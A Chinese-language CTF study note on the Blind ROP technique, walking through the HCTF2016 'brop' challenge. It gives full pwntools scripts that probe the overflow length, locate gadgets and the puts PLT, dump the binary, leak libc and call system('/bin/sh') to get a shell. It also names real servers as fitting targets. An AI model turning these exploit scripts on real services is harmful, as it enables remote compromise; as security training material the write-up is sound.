PWN学习总结（四）—— BROP

描述

1. BROP（Blind ROP）于 2014 年由 Standford 的 Andrea Bittau 提出，其相关研究成果发表在 Oakland 2014
2. 在 CTF 中，BROP 技术一般在出题方未提供二进制文件的情况下进行使用

利用条件

1. 源程序必须存在栈溢出漏洞，以便于攻击者可以控制程序流程
2. 服务器端的进程在崩溃之后会重新启动，并且重新启动的进程的地址与先前的地址一样（这也就是说即使程序有 ASLR 保护，但是其只是在程序最初启动的时候有效果）
3. 目前 nginx、MySQL、Apache、OpenSSH 等服务器应用都符合这种特性

攻击思路

1. 判断栈溢出长度，如有必要可以通过栈溢出来泄露 canaries、rbp 和返回地址
2. 寻找能够返回到 main 函数的 gadgets（通常称为 stop_gadget）
3. 寻找 brop gadgets（例如 __libc_csu_init 中的 gadgets），定位 pop rdi ; ret 的地址
4. 寻找 puts 或 write 函数的 plt，用于 leak 其它地址的值
5. dump plt 表，用于 leak 所需函数的 got 地址
6. 通过 leak 到的 got 地址，找到对应 libc 版本，通过 libc 执行系统命令进行 getshell

例题

平台：HCTF2016
题目：brop

判断栈溢出长度

#-*- coding: utf-8 -*-
from pwn import *
from LibcSearcher import LibcSearcher
#context.log_level = 'debug'
#context.arch = 'i386'/'amd64'

def GetBufLength():
	i = 1
	while 1:
		try:
			sh = process('./brop')	
			sh.recvuntil('Do you know password?\n')
			payload = 'a' * i
			sh.send(payload)
			output = sh.recv()
			#未成功返回到main函数
			if not output.startswith('No password'):
				return i - 1
			else:
				i += 1
		#触发栈溢出异常
		except EOFError:
			sh.close()
			return i - 1

buf_length = GetBufLength()
print(buf_length)

寻找 stop gadgets

#-*- coding: utf-8 -*-
from pwn import *
from LibcSearcher import LibcSearcher
#context.log_level = 'debug'
#context.arch = 'i386'/'amd64'

buf_length = 72

def GetStopAddr():
	address = 0x400000
	while 1:
		print(hex(address))
		try:
			sh = process('./brop')
			sh.recvuntil('Do you know password?\n')
			payload = 'a'*buf_length + p64(address)
			sh.send(payload)
			output = sh.recv()
			#未成功返回到main函数头部开始执行
			if not output.startswith('WelCome my friend'):
				sh.close()
				address += 1
			else:
				return address
		#触发栈溢出异常
		except EOFError:
			address += 1
			sh.close()

stop_gadgets = GetStopAddr()
print('stop gadgets = 0x%x' % stop_gadgets)

寻找 brop gadgets

#-*- coding: utf-8 -*-
from pwn import *
from LibcSearcher import LibcSearcher
#context.log_level = 'debug'
#context.arch = 'i386'/'amd64'

def GetBropGadgets(buf_length, stop_gadgets, address):
	try:
		sh = process('./brop')
		sh.recvuntil('Do you know password?\n')
		#寻找 pop_rbx_rbp_r12_r13_r14_r15_ret
		payload = 'a'*buf_length + p64(address) + p64(0)*6 + p64(stop_gadgets)
		sh.sendline(payload)
		output = sh.recv(timeout=1)
		sh.close()
		if not output.startswith('WelCome my friend'):
			return False
		return True
	except Exception:
		sh.close()
		return False
		
def check(buf_length, address):
	try:
		sh = process('./brop')
		sh.recvuntil('Do you know password?\n')
		payload = 'a'*buf_length + p64(address) + p64(0)*7
		sh.sendline(payload)
		output = sh.recv(timeout=1)
		sh.close()
		return False
	except Exception:
		sh.close()
		return True

buf_length   = 72
stop_gadgets = 0x4005d0
address      = 0x400500

while 1:
	print(hex(address))
	if GetBropGadgets(buf_length, stop_gadgets, address):
		print('possible brop gadget: 0x%x' % address)
		if check(buf_length, address):
			print('success brop gadget: 0x%x' % address)
			break
	address += 1

寻找 puts 函数的 plt 地址

#-*- coding: utf-8 -*-
from pwn import *
from LibcSearcher import LibcSearcher
#context.log_level = 'debug'
#context.arch = 'i386'/'amd64'

buf_length   = 72
stop_gadgets = 0x4005d0
brop_gadgets = 0x4007ba
pop_rdi_ret  = brop_gadgets + 9

def GetPutsPlt():
	addr = 0x400500
	while 1:
		print(hex(addr))
		try:
			sh = process('./brop')
			sh.recvuntil('Do you know password?\n')
			payload = 'a'*buf_length + p64(pop_rdi_ret) + p64(0x400000) + p64(addr) + p64(stop_gadgets)
			sh.sendline(payload)
			output = sh.recv()
			sh.close()
			if output.startswith('\x7fELF'):
				print('puts plt address = 0x%x' % addr)
				return addr
			addr += 1
		except Exception:
			sh.close()
			addr += 1

GetPutsPlt()

寻找 puts 函数的 got 地址并 dump plt 表

#-*- coding: utf-8 -*-
from pwn import *
from LibcSearcher import LibcSearcher
#context.log_level = 'debug'
#context.arch = 'i386'/'amd64'

def leak(buf_length, pop_rdi_ret, leak_addr, puts_plt, stop_gadgets):
	sh = process('./brop')
	sh.recvuntil('Do you know password?\n')
	payload = 'a'*buf_length + p64(pop_rdi_ret) + p64(leak_addr) + p64(puts_plt) + p64(stop_gadgets)
	sh.send(payload)
	try:
		data = sh.recvuntil('\nWelCome my friend', drop=True)
		sh.close()
		if data == "":
			data = '\x00'
		sh.close()
		return data
	except:
		sh.close()
		return None
	
buf_length   = 72
stop_gadgets = 0x4005d0
brop_gadgets = 0x4007ba
pop_rdi_ret  = brop_gadgets + 9
puts_plt     = 0x400565

leak_addr    = 0x400000
result = ""
while leak_addr < 0x401000:
	print(hex(leak_addr))
	data = leak(buf_length, pop_rdi_ret, leak_addr, puts_plt, stop_gadgets)
	if data is None:
		continue
	else:
		result += data
	leak_addr += len(data)
	
with open('./code','wb') as f:
	f.write(result)

使用 IDA 分析 DUMP 出来的数据：

getshell

#-*- coding: utf-8 -*-
from pwn import *
from LibcSearcher import LibcSearcher
#context.log_level = 'debug'
#context.arch = 'i386'/'amd64'

sh = process('./brop')

buf_length   = 72
stop_gadgets = 0x4005d0
brop_gadgets = 0x4007ba
pop_rdi_ret  = brop_gadgets + 9
puts_plt     = 0x400565
puts_got     = 0x601018

sh.recvuntil('Do you know password?\n')

payload  = 'a' * buf_length
payload += p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt)
payload += p64(stop_gadgets)

sh.sendline(payload)
puts_addr = u64(sh.recvuntil('\nWelCome my friend', drop=True).ljust(8, '\x00'))

libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')

#####################################################

system_addr = libc_base + libc.dump('system')
bin_sh_addr = libc_base + libc.dump('str_bin_sh')

sh.recvuntil('Do you know password?\n')

payload  = 'a' * buf_length
payload += p64(pop_rdi_ret) + p64(bin_sh_addr) + p64(system_addr) + p64(stop_gadgets)

#pwnlib.gdb.attach(proc.pidof(sh)[0]) 
sh.sendline(payload)
sh.interactive()